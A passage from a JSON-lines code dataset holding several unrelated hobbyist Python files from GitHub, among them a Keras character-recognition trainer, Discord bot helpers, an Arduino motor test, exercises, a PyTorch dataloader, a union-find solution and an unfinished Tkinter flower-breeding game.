hadr_model, ext_save=key)\n\n plt.show()\n","repo_name":"micro-uhecr/micro_combined_fit","sub_path":"Example/Propagate.py","file_name":"Propagate.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42403999014","text":"import numpy as np\nimport os\nimport random\n\nfrom PIL import Image\nfrom PIL import ImageFilter\n\nimport tensorflow as tf\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Activation\nfrom keras.layers import Dropout\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\n\nfrom sklearn.utils import shuffle\n\n# Data loading and augmentation\nimg_path = r'\\PATH_TO_DATASET'\nX_train = []\ny_train = []\nX_test = []\ny_test = []\n\nos.chdir(img_path)\ndirs = os.listdir()\nclass_dot = 0\nfor d in dirs:\n print(d, end=' ')\n index = 0\n os.chdir(os.path.join(img_path, d))\n \n files = os.listdir()\n for f in files:\n for way in ['original' , 'rotate+', 'rotate-', 'blur', 'blur&rotate', 'shift']:\n if way == 'original':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'rotate+':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n angle = random.randint(0, 50)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'rotate-':\n img = Image.open(f)\n res_img = res_img.resize((32, 32))\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n angle = random.randint(-50, 0)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'blur':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.filter(filter=ImageFilter.GaussianBlur(0.8))\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'blur&rotate':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.filter(filter=ImageFilter.GaussianBlur(0.8))\n angle = random.randint(-50, 0)\n res_img = res_img.rotate(angle, fillcolor='white')\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n elif way == 'shift':\n img = Image.open(f)\n res_img = Image.new(\"RGB\", img.size, (255, 255, 255))\n res_img.paste(img, mask=img.split()[3])\n res_img = res_img.rotate(0, fillcolor='white')\n horizontal, vertical = random.randint(-5, 5), random.randint(-5, 5)\n res_img = res_img.resize((32, 32))\n img_arr = np.array(res_img)\n \n if index >= round(len(files) / 100 * 85):\n X_test.append(img_arr)\n y_test.append([class_dot])\n\n else:\n X_train.append(img_arr)\n y_train.append([class_dot])\n \n index += 1\n \n class_dot += 1\n\nX_train = np.array(X_train, dtype='float32')\ny_train = np.array(y_train, dtype='uint8')\nX_test = np.array(X_test, dtype='float32')\ny_test = np.array(y_test, dtype='uint8')\n\nY_train = np_utils.to_categorical(y_train, 33)\nY_test = np_utils.to_categorical(y_test, 33)\n\nX_train = X_train / 255\nX_test, Y_test = shuffle(X_test / 255, Y_test)\n\nprint()\n\n\n# Model architecture\nmodel = Sequential()\n\nmodel.add(Conv2D(16, (3, 3), padding='same', input_shape=(32, 32, 3), activation='relu'))\nmodel.add(Conv2D(16, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, (3, 3), padding='same', activation='relu'))\nmodel.add(Conv2D(256, (3, 3), activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='relu'))\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dense(33, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n \nhistory = model.fit(X_train, Y_train,\n batch_size=80,\n epochs=200,\n validation_data=(X_test, Y_test),\n shuffle=True)\n\nos.chdir(r'/PATH_TO_SAVED_MODELS')\nfilename = ''\nmodel.save_weights(f'{filename}.hdf5')\nmodel.save(f'{filename}.h5')\n","repo_name":"ansafo/CNN_RusAlph","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"72004755027","text":"#Error Handling\n\nwhile(True):\n\n try:\n age=int(input('What is your age'))\n vote=10/age\n print(age)\n #throw error\n raise ValueError('hey Cut is out')\n except ValueError:\n print(\"please enter a number\")\n continue\n except ZeroDivisionError:\n print(\"Please enter age greater than 0\")\n break\n else:\n print(\"Thank you\")\n break\n finally:\n print('ok i am finally done') # it calls no matter what\n print('Can you hear me')\n\n\n\ndef sum(num1,num2):\n try:\n return num1+num2\n except TypeError:\n print('Something is Wrong')\n\n\nprint(sum('1',2))\n","repo_name":"avdhendra/100-days-of-Python","sub_path":"Day5/Error.py","file_name":"Error.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21412960687","text":"import global_\nimport json\nimport time\n\n\ndef is_clown_admin(ctx):\n \"\"\"\n Check if a message author is a specified clown admin\n :param ctx: Discord Context object\n :return: Boolean\n \"\"\"\n admin_ids = [\n 114384475743453193, # Nick\n 114338477922975745 # Lucas\n ]\n return ctx.author.id in admin_ids\n\n\ndef get_members(guild):\n \"\"\"\n Print list of members in given server\n :param guild: Discord Guild object\n \"\"\"\n members = '\\n - '.join([member.name for member in guild.members])\n print(f'Guild Members:\\n - {members}')\n\n\ndef sort_leaderboard(guild_id):\n \"\"\"\n Sort leaderboard for given guild id by values\n :param guild_id: Guild id to sort leaderboard for\n \"\"\"\n global_.leaderboard[guild_id] = {k: v for k, v in sorted(\n global_.leaderboard[guild_id].items(), key=lambda item: item[1], reverse=True)}\n\n\ndef save_leaderboard():\n \"\"\"\n Write leaderboard to file\n \"\"\"\n with open(global_.clown_file, 'w') as out_file:\n json.dump(global_.leaderboard, out_file)\n\n\nasync def get_display_name(ctx, clown_id):\n \"\"\"\n Pull given account id's display name in server that the command was called from, from the name cache, and refresh\n cache if expired\n :param ctx: Discord Context object\n :param clown_id: Discord account ID to return display name of\n :return: Display name of given id\n \"\"\"\n guild_id = str(ctx.guild.id)\n\n # Check if guild not cached or if cache has expired, and reacquire display names if so\n cache_TTL_seconds = 600\n if guild_id not in global_.name_cache.keys() or float(global_.name_cache[guild_id][\"time\"]) + cache_TTL_seconds < time.time():\n global_.name_cache[guild_id] = {\"time\": time.time(), \"members\": {}}\n async for member in ctx.guild.fetch_members(limit=None):\n global_.name_cache[guild_id][\"members\"][str(member.id)] = member.display_name\n with open(global_.name_cache_path, 'w') as out_file:\n json.dump(global_.name_cache, out_file)\n return global_.name_cache[guild_id][\"members\"][clown_id]\n\n\ndef is_wordle_channel(channel_name):\n \"\"\"\n Check if \"wordle\" appears in channel name at all\n :param channel_name: String channel name\n :return: Bool\n \"\"\"\n return \"wordle\" in channel_name.lower()\n","repo_name":"lucassherwin/ClownBot_py","sub_path":"bot/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71121672146","text":"from NanMotor import Motor\nfrom nanpy import (ArduinoApi, SerialManager)\n\nAI1 = 7\nAI2 = 8\nPWM = 9\nstdby = 10\n\ntry:\n connection = SerialManager()\n a = ArduinoApi(connection = connection)\nexcept:\n print(\"Failed to connect to Arduino\")\n\n#Setup\n#a.pinMode(AI1, a.OUTPUT)\n#a.pinMode(AI2, a.OUTPUT)\n#a.pinMode(PWM, a.OUTPUT)\na.pinMode(stdby, a.OUTPUT)\n\nm1 = Motor(AI1, AI2, PWM)\nm1.setupMotor(a)\n\na.digitalWrite(stdby, a.HIGH)\ntry:\n while True:\n speed = input(\"Input speed: \")\n if speed == \"exit\":\n break\n m1.drive(int(speed), a)\nexcept Exception as e:\n print(e)\n\nm1.drive(0, a)\n","repo_name":"ZacharyRJohnson/BC-Car","sub_path":"MotorTest.py","file_name":"MotorTest.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7813770590","text":"# Практика: Возраст\nage = abs(int(input('Введите ваш возраст: ')))\ndef activity(age):\n if age < 7:\n return 'Вы должны учиться в детском саду'\n elif age in range(8, 18):\n return 'Вы должны учиться в школе'\n elif age in range(19, 25):\n return 'Вы студент'\n else:\n return 'Вы работаете'\n\nage = activity(age)\nprint(age)\n\n# Практика: Сравнение строк\ndef two_strings(str1, str2):\n if type(str1) != str or type(str2) != str:\n return 0\n elif str1 == str2:\n return 1\n elif len(str1) > len(str2):\n return 2\n elif str2 == 'learn':\n return 3\nprint(two_strings(100, 'python')) # 0\nprint(two_strings(100, 200)) # 0\nprint(two_strings('python', 'python')) # 1\nprint(two_strings('Learn', 'py')) # 2\nprint(two_strings('py', 'learn')) # 3","repo_name":"Denvol10/lesson2_tasks","sub_path":"operator_if.py","file_name":"operator_if.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17828091765","text":"from matplotlib import transforms\nimport torch\nimport torchvision.transforms as T\nfrom torch.utils.data import DataLoader\n\nfrom .FFHQ import FFHQDataset\n\ndef sample_data(loader):\n while True:\n for batch in loader:\n yield batch\ndef get_dataloader(args, logger):\n train_transform = T.Compose([\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n T.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5), inplace=True)\n ])\n train_dataset = FFHQDataset(args, logger, transform=train_transform)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True)\n train_loader = DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n sampler=train_sampler,\n drop_last=True,\n num_workers=args.n_workers,\n pin_memory=True\n )\n train_loader = sample_data(train_loader)\n return train_loader\n \n","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/StyleGAN2/datasets/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13000168538","text":"import sys\nsys.stdin = open(\"D3_5248_input.txt\", \"r\")\n\n# 이전 풀이\n# def Find_Set(x):\n# if x == P[x]:\n# return x\n# else:\n# return Find_Set(P[x])\n#\n# T = int(input())\n# for test_case in range(T):\n# N, M = map(int, input().split())\n# data = list(map(int, input().split()))\n# P = list(range(N + 1))\n# for i in range(M):\n# P[Find_Set(data[2 * i + 1])] = Find_Set(data[2 * i]) # b의 대표 원소를 a의 대표원소로 교체\n#\n# count = 0\n# for i in range(1, N + 1): # 대표원소가 자기 자신인 경우의 수\n# if P[i] == i:\n# count += 1\n# print('#{} {}'.format(test_case+1, count))\n\n\n# 새로운 풀이\ndef union(x, y):\n x = find_set(x)\n y = find_set(y)\n if rank[x] >= rank[y]:\n parent[y] = x\n else:\n parent[x] = y\n if rank[x] == rank[y]:\n rank[x] += 1\n\ndef find_set(x):\n if parent[x] == x:\n return x\n else:\n return find_set(parent[x])\n\nT = int(input())\nfor test_case in range(T):\n N, M = map(int, input().split())\n data = list(map(int, input().split()))\n parent = list(range(N + 1))\n rank = [0] * (N + 1)\n for i in range(M):\n union(data[2 * i], data[2 * i + 1])\n ans = 0\n for i in range(1, N + 1):\n if i == parent[i]:\n ans += 1\n print(\"#{} {}\".format(test_case + 1, ans))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D3_5248.py","file_name":"D3_5248.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38754010713","text":"#TODO\r\n #Convert each petal to an image, create ability to overlay petals, change alpha, sat, and brightness, and change location for creation of extra petals. \r\n #https://www.tutorialspoint.com/how-can-i-vary-a-shape-s-alpha-with-tkinter\r\n #Set up heritability/Epigenetics\r\n #Grow multiple branches (that look nice)\r\n #Need to set an angle for each, then figure out how to reapply the smooth function.\r\n\r\nimport tkinter as tk\r\nfrom PIL import Image,ImageTk\r\nimport random\r\nimport math\r\nfrom statistics import mean\r\nimport pickle\r\nimport numpy as np #Not yet available\r\nroot = tk.Tk() #Master object to the application\r\n\r\n#Set DEBUG\r\nDEBUG=True\r\nDEBUG_L2=True\r\n\r\nclass Dimensions:\r\n \"\"\"This class uses the desired window dimensions to layout the overall design.\r\n Attributes:\r\n window = tuple containing the lower left coordinates, width, and height of window\r\n width = window width\r\n height = window height\r\n cnv = canvas, as above\r\n lbar_nav = navigation window, as above\r\n lbar_logo = logo image, as above\r\n lbar_gene = genes, as above\r\n lbar_ttl = title, as above\r\n Methods: \r\n layoutPlots: Dictionary of plots containing the plot name and x,y location.\r\n TODO:\r\n Write out a layout for the rest of the frames\"\"\"\r\n def __init__(self, width=1000): #Justified to lower left \r\n ratios={}\r\n for i in range(1, 8): ratios[\"gr\"+str(i)] = width*0.618**i\r\n self.window = 0, 0, width, ratios[\"gr1\"]\r\n self.width = self.window[2] \r\n self.height = self.window[3]\r\n self.cnv = ratios[\"gr2\"], self.height, ratios[\"gr1\"], ratios[\"gr1\"]\r\n self.lbar_nav = 0, 2*ratios[\"gr5\"]+ratios[\"gr4\"],ratios[\"gr2\"], ratios[\"gr2\"]\r\n self.lbar_logo = 0,0,ratios[\"gr4\"], ratios[\"gr5\"] #-ratios[\"gr2\"]+ratios[\"gr4\"]\r\n self.lbar_gene = 0, ratios[\"gr5\"],ratios[\"gr2\"],ratios[\"gr5\"]\r\n self.lbar_ttl = ratios[\"gr4\"],0, ratios[\"gr3\"], ratios[\"gr5\"] #-ratios[\"gr2\"]+ratios[\"gr4\"]\r\n def layoutAll(self):\r\n pass\r\n def layoutPlots(self): #Assumes center justified \r\n plots = {\"A\":[], \"B\":[], \"C\":[], \"D\":[], \"E\":[]}\r\n n=1 #intentionally not starting at 0\r\n for l in plots:\r\n plotx = round(n*self.cnv[2]/(len(plots)+2)) \r\n plots[l]= plotx, 0\r\n n+=1\r\n return plots\r\n \r\nclass Seed:\r\n \"\"\"This class makes an arbitrary seed\r\n Methods:\r\n __init__: Genome imported from the default seed\r\n importSeed: Genome imported from external seed\r\n randomSeed: Genome generated randomly\r\n selfSeed: Genome created from previous with slight variation. Number of variations controlled by self.heri.\r\n Attributes:\r\n location: tells me 'where' the seed is. Options are a plot or as a saved seed.\r\n genome:dictionaries defining the key parameters used for illustrating the plant.\r\n phenome: parameters used for introducing randomness when creating the plant, and\r\n herit: parameters used for controlling mixing of parameters of multiple plants.\r\n parent1: record of previous parent, to be used in lineage tracing later.\r\n parent2: record of previous parent, to be used in lineage tracing later\r\n\r\n TODO:\r\n Move the list of parameters to a text doc I can call, one for each named seed variety?\r\n Can then rewrite so searches for given name, easier to let user save additional named flowers.\r\n Could also then have limits parameters independent of the genome/phenome\r\n phenome will eventually introduce randomness even in cloned flowers (angle of growth, height)\r\n herit contains controls on how genome is modified later\r\n Work on crispr & clone\r\n \"\"\"\r\n def __init__(self):\r\n self.genome = {\"flower_num\":5,\r\n \"petal_num\":4, \"petal_rad\":80.0, \"petal_xFact\":2, \"petal_line\": \"#b5e3af\", \"petal_fill\":\"#D773A2\", \"petal_linewid\":2.0, \"petal_coeff\":6,\r\n \"center_line\":\"#b2b2ff\", \"center_fill\":\"#72c6ff\", \"center_linewid\":1.0,\"center_rad\":5.0, \"center_stipple\":\"\",\r\n \"layer_num\":1, \"layer_coeff\":2.0,\r\n \"stemcolor\":\"#ABCDEF\", \"thickness\":10}\r\n self.phenome = {\"height\":0} #Filling out as needed\r\n self.heri = {\"color\":1, \"selfing\":1} #Filling out as needed\r\n self.limits = {\"petal_num\":3,\r\n #\"petal_rad\": 5*(self.genome[\"center_rad\"] + self.genome[\"center_linewid\"]), \"petal_xFact\":100,\r\n #\"center_rad\": round(self.genome[\"petal_rad\"]/10),\r\n \"layer_num\":0} \r\n def importSeed(self, flowername):\r\n fn = str(flowername) + \".txt\"\r\n with open(fn, \"rt\") as file:\r\n flowergenome = pickle.load(fn)\r\n self.genome = flowergenome \r\n def randomSeed(self):\r\n for key, value in self.genome.items():\r\n newval = radiationTool(key, value)\r\n self.genome[key]=newval\r\n repairTool(self.genome, self.limits)\r\n self.parent1 = \"\"\r\n self.parent2 = \"\"\r\n def selfSeed(self):\r\n for i in range(0, self.heri[\"selfing\"]):\r\n key, value = random.choice(list(self.genome.items())) #Add a way to have a chance of no change.\r\n newval = radiationTool(key, value)\r\n self.genome[key] = newval\r\n self.parent1 = self #This doesn't seem like it would work. Ask for advice.\r\n self.parent2 = self\r\n def breedSeed(self, secondSeed):\r\n newgenome = []\r\n for key, value in self.genome.items():\r\n for geneP1, geneP2 in zip(value, secondSeed.genome[key]) :\r\n if isinstance(geneP1, int):\r\n newval = random.choice(geneP1, geneP2, round((geneP1 + geneP2)/2), random.gauss(mean(geneP1, geneP2)))\r\n elif isinstance(geneP1, float):\r\n newval = random.weibullvariate(round((geneP1 + geneP2)/2), 1)\r\n newval = float(abs(newval))\r\n elif isinstance(geneP1, bool):\r\n newval = random.randchoice(geneP1, geneP2)\r\n else:\r\n newval = [create_Colors(start=gene1[1:]+gene2[1:])]\r\n newgenome[key]=newval\r\n self.genome = newgenome\r\n self.parent1 = self\r\n self.parent2 = secondSeed\r\n def crisprSeed(self):\r\n pass\r\n def cloneSeed(self):\r\n self.parent1 = self #This doesn't seem like it would work\r\n self.parent2 = self\r\n\r\nclass Plant():\r\n \"\"\"This class makes an arbitrary seed\r\n Methods:\r\n __init__: sets location of the flower\r\n create_Circle: Draws flower center\r\n create_Petals: Draws the petals\r\n create_Flowers: Uses Circle and petals\r\n create_Nodes: Creates segments within a stem for placement of flowers, additionals stems\r\n create_Stems: Draws the full stem, interconnecting the nodes\r\n Attributes:\r\n location: Should be a plot\"\"\"\r\n def __init__(self, seed, dimensions, canvas):\r\n self.seed = seed\r\n self.dimensions = dimensions\r\n self.canvas = canvas\r\n def create_Circle(self, x, y, r, **kwargs):\r\n return self.canvas.create_oval(x-r, y-r, x+r, y+r, **kwargs)\r\n def create_Petals(self, x, y, petal_num, radius, xFactor, coefficent, **kwargs):\r\n points = []\r\n for degrees in range(0, 360-xFactor):\r\n radians = math.radians(degrees)\r\n distance = math.sin(radians * petal_num) * radius\r\n points.append(x+math.cos(coefficent*radians) * distance)\r\n points.append(y+math.sin(coefficent*radians) * distance)\r\n return self.canvas.create_polygon(points,smooth=0, **kwargs)\r\n def create_Flowers(self, bud_x, bud_y, genes):\r\n for l in range(genes[\"layer_num\"]):\r\n self.create_Petals(bud_x, bud_y, \r\n petal_num=genes[\"petal_num\"], radius=genes[\"petal_rad\"], xFactor=genes[\"petal_xFact\"], coefficent=genes[\"petal_coeff\"], \r\n fill=genes[\"petal_fill\"], outline=genes[\"petal_line\"], width=genes[\"petal_linewid\"])\r\n self.create_Circle(bud_x, bud_y, r=genes[\"center_rad\"],\r\n fill=genes[\"center_fill\"], outline=genes[\"center_line\"], \r\n width=genes[\"center_linewid\"]) \r\n def create_Nodes(self, x1, y1, flower_num, angle, length):\r\n x2 = x1 + length\r\n y2 = math.tan(angle)*(x2-x1)+y1 \r\n xnode = np.linspace(x1, x2, flower_num, dtype=int)\r\n ynode = np.linspace(y1, y2, flower_num, dtype=int)\r\n nodes = set(zip(xnode, ynode))\r\n return nodes\r\n\r\n def create_Stems(self, base_x, base_y, genes):\r\n phen_angle = random.weibullvariate(0, 1)#Add Stem Angle: genes[\"stem_angle\"].\r\n phen_length = random.weibullvariate(50, 1)# Add Length\r\n mainstem = self.create_Nodes(base_x, base_y, genes[\"flower_num\"], phen_angle, phen_length)\r\n print(\"mainstem: \", mainstem, '/n')\r\n self.canvas.create_line(base_x, base_y, max(mainstem),\r\n fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n \r\n for node in mainstem:\r\n x1 = node[0]\r\n y1 = node[1]\r\n print(\"coordinates: \", x1, y1, \"/n\")\r\n branch = self.create_Nodes(x1, y1, genes[\"flower_num\"], phen_angle+30, phen_length)\r\n print(\"branch\", branch, \"/n\")\r\n self.canvas.create_line(x1, y1, branch,\r\n fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n self.canvas.create_Flowers(max(branch), genes)\r\n #\r\n #\r\n '''if genes[\"branch_alt\"]==False:\r\n branch = create_Nodes(node, 3, phen_angle-30, 10) \r\n self.canvas.create_line(node,branch,\r\n fill=genes[\"stemcolor\"], width=genes[\"thickness\"], smooth=False)\r\n self.canvas.create_Flowers(max(branch), genes)'''\r\n\r\n \r\n\r\n'''In the process of rewriting the 'nodes' element:\r\nCurrently Line A is drawn between the base point and a number of nodes equal to the flower number. The nodes are a random point between the base and every bud. Eg, a one bud flower will have one node between the base and bud. (???).\r\nCurrently Line B is drawn between the random node points and each bud at that location.\r\nLine A should be drawn between the base point and the primary bud location. Only the first bud location is assigned by garden.\r\nLine B should be drawn between nodes along the length of Line A and a given Bud (generated as part of stem creation)\r\nEventually all phen variations will be an easy pass, not repeated in code\r\n'''\r\n\r\n''' def create_Branches(): #write this first, then come back to fix nodes\r\n if genes[\"centralized\"]==True\r\n #next nodes radiate out from x2 y2.\r\n #Needed Varaibles = length, max angle, number of nodes (will change current use case)\r\n elif genes[\"alternating\"]==True\r\n #Next nodes are spaced alternately along the length of the first line\r\n \r\n else\r\n'''\r\n \r\n\r\n\r\nclass Garden():\r\n \"\"\"This class makes the garden background and buttons for the canvas\r\n Methods:\r\n __init__: sets location of the flower\r\n create_Dirt: Draws the buttons that flowers grow 'from'\r\n create_Background: Draws the background\r\n create_Planting: Places a plant in a plot\r\n create_EmptyGarden: Draws just the background\r\n create_FullGarden: Draws the background and puts plants in all plots\r\n Attributes:\r\n TODO:\r\n Create other background options\r\n \"\"\"\r\n def __init__(self, dimensions, canvas):\r\n self.dimensions = dimensions\r\n self.canvas = canvas \r\n def create_Dirt(self, base_x, base_y):\r\n image=Image.open('./dirt4.png')\r\n img=image.resize((80, 40))\r\n dirt = ImageTk.PhotoImage(img) \r\n dirtbutton=tk.Button(canvas, image=dirt, bg='#d0e0e3', fg=None, bd=0)\r\n dirtbutton.place(x= base_x, y=base_y-40)\r\n dirt.image = dirt #Cannot delete because of garbage garbaging\r\n def create_Background(self):\r\n pass\r\n #bg = ImageTk.PhotoImage(file = \"./flowerbg_2.png\")\r\n #canvas.create_image(0,0, image = bg, anchor=tk.NW)\r\n #bg.image = bg #Cannot delete because of garbage garbaging\r\n def grow_EmptyGarden(self): \r\n canvas.delete('all')\r\n self.create_Background()\r\n plots = self.dimensions.layoutPlots() #Dimensions.layoutPlots(self.dimensions)\r\n for plot in plots:\r\n base_x = plots[plot][0]\r\n base_y = plots[plot][1]\r\n self.create_Dirt(base_x, base_y) \r\n def grow_FullGarden(self): \r\n canvas.delete('all')\r\n self.create_Background()\r\n plots = self.dimensions.layoutPlots()\r\n for plot in plots:\r\n try:\r\n seed = Seed()\r\n newplant = Plant(seed.randomSeed(), self.dimensions, self.canvas)\r\n except:\r\n newplant = Plant(seed, self.dimensions, self.canvas) #Figure out when except actually triggered\r\n base_x = plots[plot][0]\r\n base_y = dimensions.height - plots[plot][1]\r\n bud_x = [random.triangular(base_x-(self.dimensions.cnv[2]/7),base_x+(self.dimensions.cnv[2]/7), base_x) for i in range(0, seed.genome[\"flower_num\"]) ]\r\n bud_y = [random.triangular(self.dimensions.cnv[3]-(self.dimensions.cnv[3]/7),0+(self.dimensions.cnv[3]/7),0+(2*self.dimensions.cnv[3]/7)) for i in range(0, seed.genome[\"flower_num\"]) ]\r\n# print(type(base_x));print(type(base_y));print(type(bud_x));print(type(bud_y))\r\n newplant.create_Stems(base_x, base_y, seed.genome)\r\n '''for i in range(seed.genome[\"flower_num\"]):\r\n newplant.create_Flowers(bud_x[i], bud_y[i], seed.genome)'''\r\n self.create_Dirt(base_x, base_y)\r\n\r\ndef radiationTool(key, value):\r\n \"\"\"Thus function randomizes the gene it is given\r\n Parameters:\r\n key: a given gene name\r\n value: the value for that gene parameter\r\n Outputs\r\n The updated new value\"\"\"\r\n if isinstance(value, int):\r\n newval=random.weibullvariate(value, 1)\r\n newval=math.ceil(newval)\r\n newval=int(abs(newval))\r\n elif isinstance(value, float):\r\n newval=random.weibullvariate(value, 1)\r\n newval=float(abs(newval))\r\n elif isinstance(value, bool):\r\n newval=random.randchoice(True, False)\r\n elif isinstance(value, str): \r\n newval=[create_Colors()] \r\n return newval\r\n\r\ndef repairTool(genome, limits):\r\n \"\"\"This function sets limits on the gene it is given\r\n Parameters:\r\n genome: a given gene name\r\n limits: the value for that gene parameter\r\n Outputs\r\n The updated genome\"\"\"\r\n while genome[\"petal_num\"] limits[\"petal_xFact\"]: \r\n genome[\"petal_xFact\"]-= random.randint(1, 30)\r\n while genome[\"center_rad\"] < limits[\"center_rad\"]:\r\n genome[\"center_rad\"]+= random.randint(1, 40)\r\n while genome[\"layer_num\"] <=limits[\"layer_num\"]:\r\n genome[\"layer_num\"]+= random.randint(1, 2)\r\n genome[\"stemcolor\"]=make_Green(genome[\"stemcolor\"])\r\n genome[\"center_rad\"]=limits[\"center_rad\"] #Why did I go with such a strict option?\r\n return genome\r\n\r\n#def crisprTool(genome, key, guide):\r\n\r\ndef create_Colors(start='#FFFFFF', herit=10):\r\n \"\"\"Randomly create a new hex style number or update an old one proportional to heritability. If no inital hex given, a completely random color is provided.\r\n Parameters:\r\n start: initial value for hex. Default is white.\r\n herit: Number of replacements. Default is 10.\r\n Returns:\r\n rand_colors: a string of a hex color\r\n \"\"\"\r\n t=0; rand_colors=start\r\n while trr and gg>bb:\r\n return True\r\n else:\r\n return False \r\n\r\ndef make_Green(color):\r\n \"\"\"Generate random hex colors until a green color is returned\r\n Parameters:\r\n color: initial value for hex.\r\n Returns:\r\n color: final value for hex, now green\r\n \"\"\"\r\n if DEBUG_L2 == True: print(\"Now Running: make_Green.\")\r\n result = check_Green(color)\r\n if DEBUG_L2 == True: print(\"is\", color,\" green?: \", result)\r\n while result is False:\r\n color=create_Colors(color)\r\n result = check_Green(color)\r\n if DEBUG_L2 == True: print(\"Updated: is \", color, \" green?: \", result)\r\n return color \r\n \r\nif __name__ == '__main__':\r\n hl_debug=0\r\n if DEBUG == True: hl_debug=2\r\n \r\n #Create Frames & Layout\r\n dimensions = Dimensions(width=1000)\r\n\r\n frame_lbar = tk.Frame(root, highlightthickness=hl_debug, bg=\"yellow\", width=dimensions.lbar_nav[2], height=dimensions.cnv[3])\r\n frame_rbar = tk.Frame(root, highlightthickness=hl_debug, width=dimensions.cnv[2], height=dimensions.cnv[3])\r\n frame_lbar.pack(side=tk.LEFT, pady=5, padx=2.5, fill=tk.BOTH)\r\n frame_rbar.pack(side=tk.RIGHT, pady=5, padx=2.5, fill=tk.BOTH) \r\n\r\n frame_lbar_top = tk.Frame(frame_lbar)\r\n frame_lbar_top.pack(side=tk.TOP, fill=tk.BOTH)\r\n frame_lbar_logo = tk.Frame(frame_lbar_top, highlightthickness=hl_debug, width=dimensions.lbar_logo[2], height=dimensions.lbar_logo[3])\r\n frame_lbar_ttl = tk.Frame(frame_lbar_top, highlightthickness=hl_debug, width=dimensions.lbar_ttl[2], height=dimensions.lbar_ttl[3])\r\n frame_lbar_logo.pack(side=tk.LEFT, fill=tk.BOTH) \r\n frame_lbar_ttl.pack(side=tk.RIGHT, fill=tk.BOTH) \r\n frame_lbar_gene = tk.Frame(frame_lbar, highlightthickness=hl_debug, width=dimensions.lbar_gene[2], height=dimensions.lbar_gene[3])\r\n frame_lbar_gene.pack(fill=tk.BOTH)\r\n frame_lbar_bot = tk.Frame(frame_lbar, highlightthickness=1, bg=\"green\", width=dimensions.lbar_nav[2], height=dimensions.lbar_nav[3])\r\n frame_lbar_bot.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l = tk.Frame(frame_lbar_bot, width=dimensions.lbar_nav[2]/2)\r\n frame_lbar_nav_l.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_r = tk.Frame(frame_lbar_bot, width=dimensions.lbar_nav[2]/2)\r\n frame_lbar_nav_r.pack(side=tk.RIGHT, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_1=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_2=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_3=tk.Frame(frame_lbar_nav_l, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_1=tk.Frame(frame_lbar_nav_r, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_2=tk.Frame(frame_lbar_nav_r, height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_r_3=tk.Frame(frame_lbar_nav_r, 